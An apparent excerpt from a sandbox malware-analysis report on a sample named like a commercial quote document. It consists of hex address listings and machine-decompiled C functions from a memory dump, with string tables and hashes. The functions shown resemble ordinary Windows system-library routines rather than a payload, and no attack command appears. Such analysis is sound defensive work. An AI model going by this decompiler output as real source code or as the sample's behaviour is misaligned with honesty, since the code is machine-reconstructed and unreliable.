                                                                                                                                                                                  0x333f95d8
                                                                                                                                                                                  0x333f95a1
                                                                                                                                                                                  0x333f95a1
                                                                                                                                                                                  0x333f95a8
                                                                                                                                                                                  0x333f95af
                                                                                                                                                                                  0x333f95b6
                                                                                                                                                                                  0x333f95b6
                                                                                                                                                                                  0x333f95e7
                                                                                                                                                                                  0x333f95ef
                                                                                                                                                                                  0x333f95f8
                                                                                                                                                                                  0x333f9601
                                                                                                                                                                                  0x333f9607
                                                                                                                                                                                  0x333f9609
                                                                                                                                                                                  0x333f960b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9611
                                                                                                                                                                                  0x333f9611
                                                                                                                                                                                  0x333f9615
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9615
                                                                                                                                                                                  0x333f960b
                                                                                                                                                                                  0x333f94bd
                                                                                                                                                                                  0x333f94c0
                                                                                                                                                                                  0x333f94c4
                                                                                                                                                                                  0x333f94cd
                                                                                                                                                                                  0x333f94cd
                                                                                                                                                                                  0x333f94cd
                                                                                                                                                                                  0x333f94cf
                                                                                                                                                                                  0x333f94d4
                                                                                                                                                                                  0x333f94e0
                                                                                                                                                                                  0x333f94e7
                                                                                                                                                                                  0x333f94eb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f94eb
                                                                                                                                                                                  0x333f930f
                                                                                                                                                                                  0x333f9314
                                                                                                                                                                                  0x333f933c
                                                                                                                                                                                  0x333f933c
                                                                                                                                                                                  0x333f9340
                                                                                                                                                                                  0x333f934a
                                                                                                                                                                                  0x333f934f
                                                                                                                                                                                  0x333f9353
                                                                                                                                                                                  0x333f935c
                                                                                                                                                                                  0x333f9368
                                                                                                                                                                                  0x333f9370
                                                                                                                                                                                  0x333f9377
                                                                                                                                                                                  0x333f937f
                                                                                                                                                                                  0x333f9387
                                                                                                                                                                                  0x333f938d
                                                                                                                                                                                  0x333f938f
                                                                                                                                                                                  0x333f9391
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9397
                                                                                                                                                                                  0x333f939b
                                                                                                                                                                                  0x333f93ef
                                                                                                                                                                                  0x333f93f5
                                                                                                                                                                                  0x333f9400
                                                                                                                                                                                  0x333f9400
                                                                                                                                                                                  0x333f9406
                                                                                                                                                                                  0x333f9408
                                                                                                                                                                                  0x333f940c
                                                                                                                                                                                  0x333f9411
                                                                                                                                                                                  0x333f9411
                                                                                                                                                                                  0x333f9414
                                                                                                                                                                                  0x333f9418
                                                                                                                                                                                  0x333f9420
                                                                                                                                                                                  0x333f9425
                                                                                                                                                                                  0x333f9429
                                                                                                                                                                                  0x333f9436
                                                                                                                                                                                  0x333f9442
                                                                                                                                                                                  0x333f9449
                                                                                                                                                                                  0x333f9451
                                                                                                                                                                                  0x333f9459
                                                                                                                                                                                  0x333f9461
                                                                                                                                                                                  0x333f9465
                                                                                                                                                                                  0x333f946b
                                                                                                                                                                                  0x333f946d
                                                                                                                                                                                  0x333f946f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9475
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9475
                                                                                                                                                                                  0x333f939d
                                                                                                                                                                                  0x333f93a5
                                                                                                                                                                                  0x333f93d6
                                                                                                                                                                                  0x333f93df
                                                                                                                                                                                  0x333f93e3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f93e3
                                                                                                                                                                                  0x333f93a7
                                                                                                                                                                                  0x333f93c7
                                                                                                                                                                                  0x333f93cc
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f93cc
                                                                                                                                                                                  0x333f9316
                                                                                                                                                                                  0x333f931c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f931e
                                                                                                                                                                                  0x333f9322
                                                                                                                                                                                  0x333f932c
                                                                                                                                                                                  0x333f9332
                                                                                                                                                                                  0x333f9338
                                                                                                                                                                                  0x333f9334
                                                                                                                                                                                  0x333f9334
                                                                                                                                                                                  0x333f9334
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9332
                                                                                                                                                                                  0x333f9891
                                                                                                                                                                                  0x333f9891
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f9891
                                                                                                                                                                                  0x333f9296
                                                                                                                                                                                  0x333f90c8
                                                                                                                                                                                  0x333f90cd
                                                                                                                                                                                  0x333f90d0
                                                                                                                                                                                  0x333f90d8
                                                                                                                                                                                  0x333f90e4
                                                                                                                                                                                  0x333f9119
                                                                                                                                                                                  0x333f9123
                                                                                                                                                                                  0x333f912b
                                                                                                                                                                                  0x333f9136
                                                                                                                                                                                  0x333f9140
                                                                                                                                                                                  0x333f9150
                                                                                                                                                                                  0x333f9159
                                                                                                                                                                                  0x333f9166
                                                                                                                                                                                  0x333f9173
                                                                                                                                                                                  0x333f917d
                                                                                                                                                                                  0x333f918a
                                                                                                                                                                                  0x333f9194
                                                                                                                                                                                  0x333f9198
                                                                                                                                                                                  0x333f919e
                                                                                                                                                                                  0x333f91a5
                                                                                                                                                                                  0x333f91ac
                                                                                                                                                                                  0x333f91b2
                                                                                                                                                                                  0x333f91b4
                                                                                                                                                                                  0x333f91b6
                                                                                                                                                                                  0x333f91b9
                                                                                                                                                                                  0x333f91c0
                                                                                                                                                                                  0x333f91c2
                                                                                                                                                                                  0x333f91c4
                                                                                                                                                                                  0x333f91c9
                                                                                                                                                                                  0x333f91c9
                                                                                                                                                                                  0x333f91cb
                                                                                                                                                                                  0x333f91cb
                                                                                                                                                                                  0x333f91c4
                                                                                                                                                                                  0x333f91d2
                                                                                                                                                                                  0x333f91d8
                                                                                                                                                                                  0x333f91de
                                                                                                                                                                                  0x333f91e5
                                                                                                                                                                                  0x333f91e7
                                                                                                                                                                                  0x333f91e9
                                                                                                                                                                                  0x333f91eb
                                                                                                                                                                                  0x333f91ee
                                                                                                                                                                                  0x333f91f0
                                                                                                                                                                                  0x333f91f0
                                                                                                                                                                                  0x333f91f6
                                                                                                                                                                                  0x333f91f6
                                                                                                                                                                                  0x333f90e6
                                                                                                                                                                                  0x333f90ea
                                                                                                                                                                                  0x333f90ee
                                                                                                                                                                                  0x333f90ee
                                                                                                                                                                                  0x333f9208
                                                                                                                                                                                  0x333f920e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f920e

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: $ $0
                                                                                                                                                                                  • API String ID: 3446177414-3352262554
                                                                                                                                                                                  • Opcode ID: 4d91c395cde68364a772025e7b7c7ef3908cb4330aedb176d6539adbde54f1c7
                                                                                                                                                                                  • Instruction ID: a168fa0ab853f89ef95943e5f890c14e5da075675c48e5a6b95a41c6ae5627dc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d91c395cde68364a772025e7b7c7ef3908cb4330aedb176d6539adbde54f1c7
                                                                                                                                                                                  • Instruction Fuzzy Hash: 953205B5A083818FE350CF68C884B5BBBE5BF88344F84892EF599C7250D776D949CB52
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 33388540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • corrupted critical section, xrefs: 333C52CD
                                                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 333C5215, 333C52A1, 333C5324
                                                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 333C52C1
                                                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 333C5313
                                                                                                                                                                                  • Critical section address, xrefs: 333C5230, 333C52C7, 333C533F
                                                                                                                                                                                  • Critical section address., xrefs: 333C530D
                                                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 333C534E
                                                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 333C52D9
                                                                                                                                                                                  • 8, xrefs: 333C50EE
                                                                                                                                                                                  • Critical section debug info address, xrefs: 333C522A, 333C5339
                                                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 333C52B9, 333C5305
                                                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 333C5236
                                                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 333C52ED
                                                                                                                                                                                  • Thread identifier, xrefs: 333C5345
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                  • API String ID: 0-2368682639
                                                                                                                                                                                  • Opcode ID: 59617446999278060c31a6af7ba6c24f467bff70b6121b3482073ebcd8131dfa
                                                                                                                                                                                  • Instruction ID: 241e8bf7d31ca88be2704e29b72485ecdab3a49c202cc0d58763123b45567b12
                                                                                                                                                                                  • Opcode Fuzzy Hash: 59617446999278060c31a6af7ba6c24f467bff70b6121b3482073ebcd8131dfa
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E818BB5D02348AEEB10CF95CC80B9EBBF8EF09721F24C159E954BB241C774A948CB60
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334D2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                                  			E3334D2EC(unsigned int __ecx, signed int _a4, intOrPtr _a8, char* _a12, char _a16) {
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				unsigned int _v100;
				signed int _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v117;
				char _v120;
				char _v124;
				intOrPtr _v128;
				void* _v132;
				void* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v164;
				void* _t116;
				void* _t124;
				char* _t134;
				void* _t155;
				char* _t170;
				char _t171;
				void* _t176;
				signed int _t181;
				void* _t184;
				void* _t190;
				signed int _t192;
				void* _t194;
				signed int _t196;
				signed int _t198;
				void* _t200;

				_t200 = (_t198 & 0xfffffff8) - 0x74;
				_t170 = _a12;
				_v100 = __ecx;
				_v108 = 0;
				_v112 = 0;
				_v104 = 0;
				_v96 = 7;
				_v92 = 0;
				_v88 = 0;
				_v117 = 0;
				_t190 = 0;
				_v116 = 0;
				if(__ecx == 0 || _t170 == 0 || _a16 == 0) {
					_t194 = 0xc000000d;
					goto L23;
				} else {
					_t196 = _a4;
					 *_t170 = 0;
					if(_t196 == 1 || _t196 == 0) {
						E33395050(0,  &_v84, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
						_v84 = 0x18;
						_v76 =  &_v92;
						_v80 = 0;
						_push( &_v84);
						_push(0x20019);
						_v72 = 0x40;
						_push( &_v112);
						_v68 = 0;
						_v64 = 0;
						if(E33392AB0() >= 0) {
							_t124 = E33347220(_v104, _v100,  &_v116);
							_t190 = _v128;
							_t194 = _t124;
							if(_t194 != 0 || _t190 == 0) {
								_t181 = _v104;
								_t196 = _a4;
								goto L7;
							} else {
								goto L24;
							}
						} else {
							_t181 = 0;
							_v104 = 0;
							L7:
							if(_t196 == 1 && _t181 != 0) {
								_t187 =  &_v117;
								if(E3340AD61(_t181,  &_v117) >= 0) {
									asm("sbb eax, eax");
									_a4 = _t196 &  ~(_v117 - 0x00000001 & 0x000000ff);
								}
							}
							_t194 = E3334D736(0x2000000,  &_v108);
							if(_t194 < 0) {
								L51:
								 *_t170 = 1;
								goto L23;
							} else {
								if(_a4 != 1) {
									E33395050(0x2000000,  &_v84, L"Control Panel\\Desktop\\MuiCached");
									_t194 = 0;
									_v32 = _v116;
									_v28 =  &_v92;
									_push( &_v36);
									_push(0x20019);
									_v36 = 0x18;
									_push( &_v120);
									_v24 = 0x40;
									_v20 = 0;
									 *((intOrPtr*)(_t200 + 0x88)) = 0;
									if(E33392AB0() < 0) {
										 *_t170 = 1;
										L24:
										_t176 = 0;
										L25:
										_t112 = _a4;
										if(_a4 != 0 || _t190 != 0 &&  *((intOrPtr*)(_t190 + 4)) != _t176) {
											_t173 = _v100;
											L29:
											if(_t190 == 0) {
												_t190 = E33373262(1, _t187 & 0xffffff00 | _t112 != 0x00000001, _t173);
												if(_t190 == 0) {
													_t194 = 0xc0000017;
												}
											}
											goto L31;
										} else {
											_t173 = _v100;
											_t116 = E3340BD08(_v100, _t187, _t170,  &_v116);
											_t190 = _v124;
											_t194 = _t116;
											if(_t194 != 0) {
												L31:
												_t67 =  &_a16; // 0x33372e68
												 *((intOrPtr*)( *_t67)) = _t190;
												L32:
												_t105 = _v88;
												if(_v88 == 0) {
													L43:
													_t171 = 0;
													goto L34;
												} else {
													_t171 = 0;
													E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t105);
													L34:
													if(_v112 != 0) {
														_push(_v112);
														E33392A80();
														_v116 = _t171;
													}
													if(_v108 != 0) {
														_push(_v108);
														E33392A80();
														_v112 = _t171;
													}
													if(_v104 != 0) {
														_push(_v104);
														E33392A80();
													}
													goto L39;
												}
											}
											_t112 = _a4;
											goto L29;
										}
									}
									_t134 = L"MachinePreferredUILanguages";
									L15:
									E33395050(0x2000000,  &_v84, _t134);
									_push(0x2000000);
									_t187 =  &_v92;
									_t184 = E3334D64A(_v120,  &_v92,  &_v104, _t194,  &_v100);
									_t194 = 0xc0000034;
									if(_t184 == 0xc0000034) {
										L42:
										_t176 = 0;
										 *_t170 = 1;
										_t194 = 0;
										goto L25;
									}
									_t140 = _v96;
									if(_v96 == 0) {
										goto L42;
									}
									if(_t184 != 0x80000005) {
										goto L43;
									}
									_t192 = L33365D90(_t184,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t140 + 2);
									_v104 = _t192;
									if(_t192 == 0) {
										_t194 = 0xc0000017;
										goto L43;
									}
									_push(_t184);
									_t187 =  &_v88;
									_t194 = E3334D64A(_v116,  &_v88,  &_v100, _t192,  &_v96);
									if(_t194 < 0) {
										L22:
										_t190 = _v124;
										L23:
										if(_t194 != 0) {
											goto L32;
										}
										goto L24;
									}
									if(_v104 != 7) {
										if(_v104 == 1) {
											goto L21;
										}
										_t190 = _v124;
										_t176 = 0;
										_t194 = 0;
										 *_t170 = 1;
										goto L25;
									}
									L21:
									_t187 = _t192;
									_t194 = L33374CA6(_v108, _t192, _v100 >> 1, 8, (0 | _a4 != 0x00000001) + 2, "true",  &_v124);
									goto L22;
								}
								_t155 = E3334D8D0(0x2000000, _v108, _v100,  &_v116);
								_t190 = _v128;
								_t194 = _t155;
								if(_t194 == 0) {
									if(_t190 != 0) {
										goto L31;
									}
								}
								E33395050(0x2000000,  &_v84, L"Control Panel\\Desktop");
								_v56 = _v116;
								 *((intOrPtr*)(_t200 + 0x58)) =  &_v92;
								 *((intOrPtr*)(_t200 + 0x60)) = 0;
								_v40 = 0;
								_push( &_v60);
								_push(0x20019);
								_v60 = 0x18;
								_push( &_v120);
								 *((intOrPtr*)(_t200 + 0x68)) = 0x40;
								_t194 = E33392AB0();
								if(_t194 < 0) {
									goto L51;
								}
								_t134 = L"PreferredUILanguages";
								if(_a8 != 3) {
									_t134 = L"PreferredUILanguagesPending";
								}
								_t194 = 0;
								goto L15;
							}
						}
					} else {
						_t194 = 0xc000000d;
						L39:
						return _t194;
					}
				}
			}


















































                                                                                                                                                                                  0x3334d2f4
                                                                                                                                                                                  0x3334d2f8
                                                                                                                                                                                  0x3334d2ff
                                                                                                                                                                                  0x3334d303
                                                                                                                                                                                  0x3334d307
                                                                                                                                                                                  0x3334d30b
                                                                                                                                                                                  0x3334d30f
                                                                                                                                                                                  0x3334d317
                                                                                                                                                                                  0x3334d31b
                                                                                                                                                                                  0x3334d31f
                                                                                                                                                                                  0x3334d325
                                                                                                                                                                                  0x3334d327
                                                                                                                                                                                  0x3334d32d
                                                                                                                                                                                  0x333aa69c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d344
                                                                                                                                                                                  0x3334d344
                                                                                                                                                                                  0x3334d347
                                                                                                                                                                                  0x3334d34c
                                                                                                                                                                                  0x3334d360
                                                                                                                                                                                  0x3334d369
                                                                                                                                                                                  0x3334d371
                                                                                                                                                                                  0x3334d37b
                                                                                                                                                                                  0x3334d37f
                                                                                                                                                                                  0x3334d380
                                                                                                                                                                                  0x3334d389
                                                                                                                                                                                  0x3334d391
                                                                                                                                                                                  0x3334d392
                                                                                                                                                                                  0x3334d396
                                                                                                                                                                                  0x3334d3a1
                                                                                                                                                                                  0x333aa60d
                                                                                                                                                                                  0x333aa612
                                                                                                                                                                                  0x333aa616
                                                                                                                                                                                  0x333aa61a
                                                                                                                                                                                  0x333aa624
                                                                                                                                                                                  0x333aa628
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d3a7
                                                                                                                                                                                  0x3334d3a7
                                                                                                                                                                                  0x3334d3a9
                                                                                                                                                                                  0x3334d3ad
                                                                                                                                                                                  0x3334d3b0
                                                                                                                                                                                  0x333aa630
                                                                                                                                                                                  0x333aa63b
                                                                                                                                                                                  0x333aa64c
                                                                                                                                                                                  0x333aa650
                                                                                                                                                                                  0x333aa650
                                                                                                                                                                                  0x333aa63b
                                                                                                                                                                                  0x3334d3c9
                                                                                                                                                                                  0x3334d3cd
                                                                                                                                                                                  0x333aa658
                                                                                                                                                                                  0x333aa658
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d3d3
                                                                                                                                                                                  0x3334d3d7
                                                                                                                                                                                  0x3334d5d5
                                                                                                                                                                                  0x3334d5de
                                                                                                                                                                                  0x3334d5e0
                                                                                                                                                                                  0x3334d5e8
                                                                                                                                                                                  0x3334d5f0
                                                                                                                                                                                  0x3334d5f1
                                                                                                                                                                                  0x3334d5fa
                                                                                                                                                                                  0x3334d602
                                                                                                                                                                                  0x3334d603
                                                                                                                                                                                  0x3334d60e
                                                                                                                                                                                  0x3334d615
                                                                                                                                                                                  0x3334d623
                                                                                                                                                                                  0x3334d642
                                                                                                                                                                                  0x3334d52e
                                                                                                                                                                                  0x3334d52e
                                                                                                                                                                                  0x3334d530
                                                                                                                                                                                  0x3334d530
                                                                                                                                                                                  0x3334d535
                                                                                                                                                                                  0x3334d549
                                                                                                                                                                                  0x3334d54d
                                                                                                                                                                                  0x3334d54f
                                                                                                                                                                                  0x3334d560
                                                                                                                                                                                  0x3334d564
                                                                                                                                                                                  0x333aa6cd
                                                                                                                                                                                  0x333aa6cd
                                                                                                                                                                                  0x3334d564
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333aa6a6
                                                                                                                                                                                  0x333aa6ac
                                                                                                                                                                                  0x333aa6b2
                                                                                                                                                                                  0x333aa6b7
                                                                                                                                                                                  0x333aa6bb
                                                                                                                                                                                  0x333aa6bf
                                                                                                                                                                                  0x3334d56a
                                                                                                                                                                                  0x3334d56a
                                                                                                                                                                                  0x3334d56d
                                                                                                                                                                                  0x3334d56f
                                                                                                                                                                                  0x3334d56f
                                                                                                                                                                                  0x3334d575
                                                                                                                                                                                  0x3334d63b
                                                                                                                                                                                  0x3334d63b
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d57b
                                                                                                                                                                                  0x3334d582
                                                                                                                                                                                  0x3334d588
                                                                                                                                                                                  0x3334d58d
                                                                                                                                                                                  0x3334d592
                                                                                                                                                                                  0x3334d594
                                                                                                                                                                                  0x3334d598
                                                                                                                                                                                  0x3334d59d
                                                                                                                                                                                  0x3334d59d
                                                                                                                                                                                  0x3334d5a6
                                                                                                                                                                                  0x3334d5a8
                                                                                                                                                                                  0x3334d5ac
                                                                                                                                                                                  0x3334d5b1
                                                                                                                                                                                  0x3334d5b1
                                                                                                                                                                                  0x3334d5ba
                                                                                                                                                                                  0x333aa6d7
                                                                                                                                                                                  0x333aa6db
                                                                                                                                                                                  0x333aa6db
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d5ba
                                                                                                                                                                                  0x3334d575
                                                                                                                                                                                  0x333aa6c5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333aa6c5
                                                                                                                                                                                  0x3334d535
                                                                                                                                                                                  0x3334d625
                                                                                                                                                                                  0x3334d465
                                                                                                                                                                                  0x3334d46b
                                                                                                                                                                                  0x3334d470
                                                                                                                                                                                  0x3334d480
                                                                                                                                                                                  0x3334d489
                                                                                                                                                                                  0x3334d48b
                                                                                                                                                                                  0x3334d492
                                                                                                                                                                                  0x3334d62f
                                                                                                                                                                                  0x3334d62f
                                                                                                                                                                                  0x3334d631
                                                                                                                                                                                  0x3334d634
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d634
                                                                                                                                                                                  0x3334d498
                                                                                                                                                                                  0x3334d49e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d4aa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d4c4
                                                                                                                                                                                  0x3334d4c6
                                                                                                                                                                                  0x3334d4cc
                                                                                                                                                                                  0x333aa677
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333aa677
                                                                                                                                                                                  0x3334d4d2
                                                                                                                                                                                  0x3334d4e2
                                                                                                                                                                                  0x3334d4eb
                                                                                                                                                                                  0x3334d4ef
                                                                                                                                                                                  0x3334d526
                                                                                                                                                                                  0x3334d526
                                                                                                                                                                                  0x3334d52a
                                                                                                                                                                                  0x3334d52c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d52c
                                                                                                                                                                                  0x3334d4f6
                                                                                                                                                                                  0x333aa686
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333aa68c
                                                                                                                                                                                  0x333aa690
                                                                                                                                                                                  0x333aa692
                                                                                                                                                                                  0x333aa694
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333aa694
                                                                                                                                                                                  0x3334d4fc
                                                                                                                                                                                  0x3334d507
                                                                                                                                                                                  0x3334d524
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d524
                                                                                                                                                                                  0x3334d3ea
                                                                                                                                                                                  0x3334d3ef
                                                                                                                                                                                  0x3334d3f3
                                                                                                                                                                                  0x3334d3f7
                                                                                                                                                                                  0x333aa662
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333aa668
                                                                                                                                                                                  0x3334d407
                                                                                                                                                                                  0x3334d410
                                                                                                                                                                                  0x3334d418
                                                                                                                                                                                  0x3334d41e
                                                                                                                                                                                  0x3334d422
                                                                                                                                                                                  0x3334d42a
                                                                                                                                                                                  0x3334d42b
                                                                                                                                                                                  0x3334d434
                                                                                                                                                                                  0x3334d43c
                                                                                                                                                                                  0x3334d43d
                                                                                                                                                                                  0x3334d44a
                                                                                                                                                                                  0x3334d44e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d458
                                                                                                                                                                                  0x3334d45d
                                                                                                                                                                                  0x333aa66d
                                                                                                                                                                                  0x333aa66d
                                                                                                                                                                                  0x3334d463
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3334d463
                                                                                                                                                                                  0x3334d3cd
                                                                                                                                                                                  0x333aa5f6
                                                                                                                                                                                  0x333aa5f6
                                                                                                                                                                                  0x3334d5c0
                                                                                                                                                                                  0x3334d5c8
                                                                                                                                                                                  0x3334d5c8
                                                                                                                                                                                  0x3334d34c

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.73
                                                                                                                                                                                  • API String ID: 0-1902710962
                                                                                                                                                                                  • Opcode ID: 708bd8a9781cc954fc3c44e4547994abdd77ee6d46da34afb5342e712fbda181
                                                                                                                                                                                  • Instruction ID: 2ce1e656820a4cfba3f0d54bd4b20b69998cde96923969e1688679be9285ae1f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 708bd8a9781cc954fc3c44e4547994abdd77ee6d46da34afb5342e712fbda181
                                                                                                                                                                                  • Instruction Fuzzy Hash: 44B19DB69093459FD711CF28C880B6FB7E8AF84754F46892EF888D7211DB74D9488B92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333F86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                                  			E333F86C2(void* __ebx, signed short* __ecx, signed short __edx) {
				signed int _v8;
				char _v268;
				char _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				char _v1076;
				signed int _v1084;
				signed int _v1092;
				signed short _v1096;
				void* __edi;
				void* __esi;
				signed int _t54;
				short* _t59;
				void* _t65;
				signed int _t66;
				void* _t67;
				intOrPtr _t69;
				void* _t74;
				void* _t75;
				void* _t80;
				void* _t81;
				signed short _t82;
				signed short* _t84;
				void* _t85;
				intOrPtr* _t86;
				signed int _t90;
				void* _t92;
				signed int _t93;
				signed int _t95;

				_t82 = __edx;
				_t75 = __ebx;
				_t95 = (_t93 & 0xfffffff8) - 0x448;
				_v8 =  *0x3344b370 ^ _t95;
				_t84 = __ecx;
				_v324 = L"svchost.exe";
				_v320 = L"runtimebroker.exe";
				_t90 = 0;
				_v316 = L"csrss.exe";
				_v312 = L"smss.exe";
				_v308 = L"services.exe";
				_v304 = L"lsass.exe";
				_v1084 =  *[fs:0x30];
				if((E33350670() & 0x00010000) != 0) {
					L26:
					 *0x334438c0 = _t90;
					_t90 = 1;
				} else {
					if(E333542B0(0, 0, L"http://schemas.microsoft.com/SMI/2020/WindowsSettings", L"heapType",  &_v300, 0xf, 0) < 0) {
						L3:
						_t54 = _v1084;
						if(( *(_t54 + 3) & 0x00000010) == 0) {
							if( *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x2b0)) != _t90) {
								goto L26;
							} else {
								if(_t84 != 0) {
									_t79 = _t90;
									_t82 = _t84[2];
									_t59 = _t82 + ((( *_t84 & 0x0000ffff) >> 1) - 1) * 2;
									while(1) {
										_v1092 = _t79;
										if(_t59 <= _t82) {
											break;
										}
										if( *_t59 == 0x5c) {
											if(_t79 == 0) {
												L24:
												_v1096 = 0x100;
												if(E33384E50(0xfffffffc,  &_v268,  &_v1096, _t90, _t90, _t90,  &_v1084) >= 0) {
													_t65 = E33397AD0( &_v268, L"DefaultBrowser_NOPUBLISHERID", 0x1d);
													_t95 = _t95 + 0xc;
													if(_t65 == 0) {
														goto L26;
													}
												}
											} else {
												_t28 = _t59 + 2; // 0x2
